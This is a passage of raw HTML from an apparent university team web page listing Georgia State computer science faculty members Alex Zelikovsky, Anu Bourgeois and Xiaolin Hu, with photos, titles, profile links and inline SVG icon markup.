0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 